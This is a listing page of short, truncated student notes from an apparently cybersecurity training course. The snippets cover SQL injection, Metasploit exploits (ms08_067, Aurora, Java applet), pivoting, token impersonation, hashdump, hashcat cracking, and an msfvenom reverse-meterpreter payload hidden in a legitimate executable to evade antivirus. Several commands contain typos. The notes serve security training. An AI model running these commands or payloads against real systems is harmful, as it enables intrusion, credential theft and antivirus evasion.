Advanced Penetration Testing Notes

h

h [view]

By: Zaza | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: May 19, 2017

WebApp - SQL Injection

Go to Login id=2 in the address Add a single quote ?id=2’ The error log provided the SQL code id or 1 in (SELECT DB.NAME(0))  — was able to get the DB name 2 or 1=1 — #sqlmap -u ”http://192.168.1.23/bookservice/bookdetail.asp [view]

By: rspeight10 | Related Lesson: WebApp (part 3) SQL Injection | Modified: May 18, 2017

Post Exploitation Pivoting

meterpreter> ifconfig msf exploit(ms08_067_netapi)> use auxiliary/server/sock4a msf exploit(ms08_067_netapi)> show options /opt/smbexec# nano /etc/proxychains.conf /opt/smbexec# proxychains nmap -Pn -cV -p 445,446 172.16.233.141     [view]

By: rspeight10 | Related Lesson: Post Exploitation (part 3) Pivoting | Modified: May 18, 2017

Post Exploitation

incognito metertreper > sshexec meterpreter> list tokens -u impersonate_token BULBXP\\secret [view]

By: rspeight10 | Related Lesson: Post Exploitation (part 2) Exploit Development | Modified: May 18, 2017

Advanced Exploitation - File Transfer

msf (exploit) > session -I 1 meterpreter> hashdump meterpreter > upload <path> C:\\ meterpreter> download cd /usr/share/metaexploit-framework/scripts/meterpreter udev, udevadm   [view]


Advanced Exploitation - Bypassing

# msfvenom -p windows/meterpreter/reverse_rcp LHOST=192.168.1.77 LPORT=-1234 -x /usr/share/windows-binaries/radmin.exe -k -f exe > rdamin.exe need to create listener to catch it. virsustotal do not upload your payload to this site [view]

By: rspeight10 | Related Lesson: Advanced Exploitation (part 5) Bypassing Antivirus Software | Modified: May 18, 2017

Advanced Exploitation - Social

Social Engineering setoolkit (Social Engineering Tool Kit)     [view]

By: rspeight10 | Related Lesson: Advanced Exploitation (part 4) Social Engineering | Modified: May 18, 2017

Advanced Exploiting - Java

msf exploit(handler) > use exploit/multi/browser/java_signed_applet msf exploit(handler) > show options msf exploit(handler) > search appletname bulbsec msf exploit(handler) > set uripath applet msf exploit(handler) > show payloads msf [view]

By: rspeight10 | Related Lesson: Advanced Exploitation (part 3) Exploiting Java | Modified: May 18, 2017

Client Side Attacks

msf> use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora)> show options msf > msf exploit(ms10_002_aurora)> set uripath class msf exploit(ms10_002_aurora)> show payloads msf exploit(ms10_002_aurora)> set payload [view]

By: rspeight10 | Related Lesson: Advanced Exploitation (part 2) Client Side Attacks | Modified: May 18, 2017

oclhashcat

Used for Gaming Machines build a password cracking box via the Cloud hashcat –help (provides a list of modes) cd /usr/share/hashcat cd /usr/share/wordlist hashcat -m 1000 DESKtop/Windows7hashes.txt -o win7caracked.txt /usr/share/wordlists/rocky [view]

By: rspeight10 | Related Lesson: Passwords (part 4) Using oclhashcat | Modified: May 18, 2017

« First ‹ Previous 1 41 131 139 140 141 142 143 151 241 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel